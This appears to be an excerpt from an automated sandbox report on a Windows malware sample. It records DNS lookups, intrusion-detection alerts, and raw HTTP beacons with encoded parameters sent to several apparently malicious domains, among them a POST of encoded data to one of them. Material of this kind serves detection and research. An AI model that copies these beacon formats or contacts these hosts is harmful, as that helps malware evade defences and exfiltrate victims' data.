Source: Joe Sandbox View, IP Address: 208.91.197.27
Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View, ASN Name: NTT-LT-ASLT
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49704
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49711
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 events)
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
Source: global traffic, HTTP traffic detected:
    GET /hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.multileveltravel.world
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.falconclub.online
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.promasterev.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.childlesscatlady.today
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.doggieradio.net
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHD HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.demovix.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.palcoconnector.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shanhaiguan.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
            Source: global trafficDNS traffic detected: DNS query: www.falconclub.online
            Source: global trafficDNS traffic detected: DNS query: www.promasterev.shop
            Source: global trafficDNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
            Source: global trafficDNS traffic detected: DNS query: www.doggieradio.net
            Source: global trafficDNS traffic detected: DNS query: www.demovix.xyz
            Source: global trafficDNS traffic detected: DNS query: www.palcoconnector.net
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.mtcep.org
            Source: global trafficDNS traffic detected: DNS query: www.es-lidl.online
            Source: unknownHTTP traffic detected: POST /sld7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.falconclub.onlineOrigin: http://www.falconclub.onlineCache-Control: max-age=0Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.falconclub.online/sld7/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4d 4c 6b 63 4b 68 4d 35 55 4d 6b 47 6c 34 47 46 4d 42 41 59 53 66 6c 65 70 4e 31 36 66 36 35 5a 55 34 52 6d 44 71 6f 3d Data Ascii: F2=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bMLkcKhM5UMkGl4GFMBAYSflepN16f65ZU4RmDqo=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Thu, 07 Nov 2024 14:28:00 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 
0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 
6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 
6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
